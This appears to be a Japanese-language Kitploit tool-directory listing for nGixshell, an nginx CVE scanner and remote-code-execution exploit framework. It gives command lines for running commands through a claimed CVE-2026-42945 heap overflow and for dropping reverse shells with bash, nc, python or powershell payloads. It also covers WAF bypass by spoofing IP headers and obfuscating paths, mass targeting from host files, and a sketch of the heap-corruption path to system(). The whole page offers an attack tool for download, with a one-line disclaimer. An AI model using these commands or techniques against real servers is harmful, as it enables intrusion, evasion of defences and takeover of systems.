Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nGixshell — nginx CVEスキャナー + RCEエクスプロイトフレームワーク (CVE-2026-42945 ほか16件) | Kitploit
ツール/GitHubGitHub/mateusverass/ngixshell
偵察脆弱性スキャナーエクスプロイトフレームワークウェブアプリケーション悪用WAFバイパスウェブセキュリティペネトレーションテストコマンド&コントロールサブドメイン列挙レッドチーミングペイロード開発
21863ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
mateusverass/ngixshell

nGixshell

nginx CVEスキャナー + RCEエクスプロイトフレームワーク (CVE-2026-42945 ほか16件)

リポジトリを見る
nGixShell

Python CVEs Zero deps License


nGixShell は nginx の CVE スキャナ兼 RCE エクスプロイトフレームワークです。ngx_http_rewrite_module における深刻なヒープバッファオーバーフローである CVE-2026-42945 の動作する概念実証(PoC)と、自動 HTTP プローブ、フィンガープリンティング、WAF 検出・バイパス、Web セキュリティ監査、レポート生成を備えた 53 件の nginx CVE をカバーするスキャナを同梱しています。

外部依存関係ゼロ。純粋な Python 3 標準ライブラリのみで動作します。


クイックスタート

root@kitploit:~
# Spin up the vulnerable lab
docker compose -f env/docker-compose.yml up -d

# Auto mode — fingerprint + CVE scan + web audit
python3 ngixshell.py 127.0.0.1:19321

# Execute a command via RCE (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

フラグは不要です — ツールにターゲットを指定するだけで、すべてが自動で実行されます。
TLS は自動検出されます。server_tokens off が設定されていても nginx をフィンガープリントできます。


使い方

root@kitploit:~
python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

モード

WAF 検出とバイパス

フラグ説明
--waf-detectスキャン前に WAF を検出
--waf-bypassすべてのバイパステクニックを有効化(WAF 検出も実行)
--waf-ip IPバイパスヘッダーでこの IP を偽装(デフォルト: ランダムな RFC1918 アドレス)

バイパステクニック(--waf-bypass 設定時はすべて有効):

検出可能な WAF: Cloudflare、AWS WAF、Akamai、Imperva/Incapsula、ModSecurity、F5 BIG-IP ASM、Sucuri、Barracuda、NAXSI、Fastly、Wordfence

Web 監査

スキャンモードで自動実行されます。各モジュールは個別にスキップできます。

  • ヘッダー監査 — HSTS、CSP、X-Frame-Options、X-Content-Type-Options、Referrer-Policy、Permissions-Policy、バージョン情報を漏えいするヘッダー
  • パス探索 — 50 以上のパス。センチネルプローブにより catch-all の 403/301 ルールによる誤検知を排除
  • 仮想ホスト列挙 — デフォルトブロックによる誤検知を避けるため、ステータスとボディの差分の両方を確認
  • TLS 監査 — TLS 1.0~1.3 のサポート、証明書の有効期限、自己署名証明書の検出をテスト
  • stub_status — 公開されている場合、/nginx_status からアクティブ接続のメトリクスを解析

接続

フラグ説明
--port PORTポートを上書き
--tlsTLS を強制(デフォルトでは自動検出)

HTTP

フラグ説明
--user-agent UAカスタム User-Agent
--auth USER:PASSHTTP ベーシック認証
--cookie VALUE

レート / タイミング

フラグ説明
--rate-limit RPS1 秒あたりの最大リクエスト数
--jitter MSリクエスト間のランダム遅延(0~MS ミリ秒)
--retry N

出力

フラグ説明
--output FILEログを FILE に書き込む

CVE カバレッジ

2009 年から 2026 年にかけての 53 件を収録。CVSS スコア順にソート済み。


脆弱性の詳細(CVE-2026-42945)

nginx の rewrite スクリプトエンジンは、バッファサイズを計算してからコピーするという2 パス方式を採用しています。rewrite の置換文字列に ? が含まれるとメインエンジンで is_args フラグが設定されますが、長さ計算パスは新しくゼロ初期化されたサブエンジン上で実行されます:

  • 長さ計算パス — is_args = 0 のため、生のキャプチャ長を返す
  • コピーパス — is_args = 1 のため、ngx_escape_uri(NGX_ESCAPE_ARGS) を呼び出し、安全でない各バイトを 3 バイトに展開する

このコピーにより、サイズ不足のヒープバッファが攻撃者が制御する URI データでオーバーフローします。エクスプロイトは、クロスリクエストのヒープ feng shui によって隣接する ngx_pool_t のクリーンアップポインタを破壊し、プール破棄時に system() を呼び出す偽の ngx_pool_cleanup_s へリダイレクトします。

影響を受けるバージョン

製品影響を受けるバージョン修正済みバージョン
NGINX Open Source0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

ベンダーアドバイザリ: https://my.f5.com/manage/s/article/K000160932


ラボ環境のセットアップ

Ubuntu 24.04 LTS でテスト済み。Docker と Python 3.8 以降が必要です。

root@kitploit:~
# Start the vulnerable lab (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# Full scan
python3 ngixshell.py 127.0.0.1:19321

# RCE with JSON output
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# Reverse shell — bash payload, PTY auto-upgrade
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF bypass scan with spoofed IP
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# Through SOCKS5 proxy
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# Subdomain scan with rate limiting
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# Multiple targets, JSON output, HTML report
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

免責事項

許可を得たセキュリティテスト、CTF コンペティション、研究目的に限り使用してください。

ツールをダウンロード
フラグ説明
(なし)自動 — フィンガープリント + CVE スキャン + Web 監査
--cmd 'CMD'CVE-2026-42945 の RCE 経由でコマンドを実行
--cmd-file FILEファイルからコマンドを実行(; で連結)
--shellリバースシェルを生成
--shell-type TYPEペイロード: bash python perl php nc powershell(デフォルト: python)
--upgrade-shellシェル接続後に PTY アップグレードを自動送信
--subdomain-scan DOMAINサブドメイン上の脆弱な nginx を検索
--cve CVE-ID特定の CVE を 1 件テスト
--list-cves53 件すべての CVE を CVSS とプローブ情報付きで表示
--list-candidatesヒープアドレスの候補を表示
--dry-runフィンガープリント + スキャンのみ(エクスプロイトなし)
--target-file FILEファイルから複数のホストをスキャン
テクニック詳細
IP 偽装X-Forwarded-For、X-Real-IP、X-Originating-IP、True-Client-IP、X-Remote-IP、X-Client-IP
UA ローテーション11 種類の実在するブラウザ/ボットの User-Agent をリクエストごとにランダム化
パス難読化ダブルスラッシュ、/./ パディング、パーセントエンコーディング、大文字小文字のバリエーション
ヘッダー名大文字小文字シャッフルヘッダー名の大文字小文字をランダム化して WAF のパターンマッチングを回避
フラグ説明
--skip-headersHTTP セキュリティヘッダー監査をスキップ
--skip-pathsパス・ファイル探索をスキップ
--skip-vhosts仮想ホスト列挙をスキップ
--skip-tlsTLS プロトコル監査をスキップ
--path-wordlist FILE追加でプローブするパス(1 行に 1 つ)
--proxy URL
プロキシ: http://、https://、socks5://
Cookie ヘッダー
--header NAME:VALUE追加ヘッダー(繰り返し指定可能)
判定不能なプローブを再試行(デフォルト: 1)
--timeout-multiplier Xすべてのタイムアウトを拡大(デフォルト: 1.0)
--json最後に JSON サマリーを出力
--html-report [FILE]HTML レポートを生成(デフォルト: ngixshell_<host>_<ts>.html)
--verboseデバッグ出力
CVECVSSコンポーネント説明
CVE-2026-429459.8 CRITICALrewriteヒープオーバーフロー → RCE(実証済み)
CVE-2026-429468.1 HIGHrewriteメモリ破壊(同一アドバイザリ)
CVE-2022-417417.8 HIGHmp4悪意のある mp4 によるメモリ破壊
CVE-2016-12477.8 HIGHpackagingログファイルのシンボリックリンクによる権限昇格
CVE-2021-230177.7 HIGHresolverオフバイワンによるヒープ上書き
CVE-2026-407017.5 HIGHrequestリクエスト処理におけるメモリ破壊
CVE-2026-429347.5 HIGHrequestメモリ破壊(同一アドバイザリ)
CVE-2026-277847.5 HIGHmp4巧妙に細工された mp4 によるバッファオーバーフロー
CVE-2026-326477.5 HIGHmp4バッファオーバーフロー(上記の関連脆弱性)
CVE-2024-249907.5 HIGHHTTP/3QUIC モジュールにおける Use-After-Free
CVE-2024-249897.5 HIGHHTTP/3QUIC における NULL ポインタ参照
CVE-2024-310797.5 HIGHHTTP/3QUIC エンコーダにおけるスタックオーバーフロー
CVE-2024-327607.5 HIGHHTTP/3HEADERS フレームによるバッファ上書き
CVE-2022-417427.5 HIGHmp4ヒープメモリの情報漏えい
CVE-2017-75297.5 HIGHrange filter整数オーバーフロー → 領域外読み取り
CVE-2016-07467.5 HIGHresolver巧妙に細工された DNS 応答による Use-After-Free
CVE-2014-01337.5 HIGHSPDYSPDY 実装におけるヒープオーバーフロー
CVE-2014-00887.5 HIGHSPDYSPDY におけるメモリ破壊
CVE-2013-45477.5 HIGHcoreスペース + NUL による URI バイパス
CVE-2013-20287.5 HIGHcoreチャンク転送エンコーディングによるスタックオーバーフロー
CVE-2012-11807.5 HIGHproxyプロキシモジュールにおける Use-After-Free
CVE-2009-35557.5 HIGHSSLTLS 再ネゴシエーション注入(MITM)
CVE-2009-26297.5 HIGHcoreURI 解析におけるバッファアンダーフロー
CVE-2026-429266.5 MEDIUMHTTP/2プロキシ経由のリクエストスプリッティング
CVE-2026-276546.5 MEDIUMWebDAVDAV モジュールにおけるヒープオーバーフロー
CVE-2026-287536.5 MEDIUMmailメールプロキシにおけるヘッダーインジェクション
CVE-2026-16426.5 MEDIUMproxySSL アップストリームセッション再利用による情報漏えい
CVE-2019-95116.5 MEDIUMHTTP/2Data Dribble による CPU・メモリ DoS
CVE-2012-20896.8 MEDIUMmp4mp4 リクエストによるバッファオーバーフロー
CVE-2018-168455.5 MEDIUMmp4整数アンダーフロー → クラッシュ + 情報漏えい
CVE-2019-203725.3 MEDIUMproxyHTTP リクエストスマグリング
CVE-2026-404605.3 MEDIUMHTTP/3QUIC 接続のなりすまし
CVE-2026-287555.3 MEDIUMSSLOCSP 処理におけるメモリ情報漏えい
CVE-2025-234195.3 MEDIUMSSLTLS セッション再開による証明書バイパス
CVE-2024-352005.3 MEDIUMHTTP/3NULL ポインタ参照
CVE-2024-341615.3 MEDIUMHTTP/3メモリ情報漏えい
CVE-2016-44505.3 MEDIUMcoreチャンク化されたリクエストボディによる NULL ポインタ
CVE-2016-07425.0 MEDIUMresolver巧妙に細工された UDP パケットによる無効なポインタ
CVE-2016-07475.0 MEDIUMresolverCNAME 解決の回数制限の不備
CVE-2014-35565.0 MEDIUMmailSTARTTLS コマンドインジェクション
CVE-2013-20705.3 MEDIUMproxyバックエンド応答の情報漏えい
CVE-2011-49635.0 MEDIUMaccessIPv6 リテラルによるアクセス制御バイパス
CVE-2011-43155.0 MEDIUMresolver巧妙に細工された DNS 応答によるヒープオーバーフロー
CVE-2009-38965.0 MEDIUMcoreNULL ポインタ参照による DoS
CVE-2025-538594.3 MEDIUMmailSMTP コマンドインジェクション
CVE-2014-36164.3 MEDIUMSSLTLS SNI による仮想ホスト混同
CVE-2026-276514.3 MEDIUMmailメールプロキシにおける NULL ポインタ参照
CVE-2019-95134.3 MEDIUMHTTP/2Resource Loop による CPU DoS
CVE-2019-95164.3 MEDIUMHTTP/20 長ヘッダーによるメモリ枯渇
CVE-2018-168434.3 MEDIUMHTTP/2過剰なメモリ消費
CVE-2018-168444.3 MEDIUMHTTP/2SETTINGS フレームによる過剰な CPU 消費
CVE-2024-73474.7 MEDIUMmp4領域外読み取り
CVE-2009-38984.9 MEDIUMWebDAVCOPY/MOVE によるディレクトリトラバーサル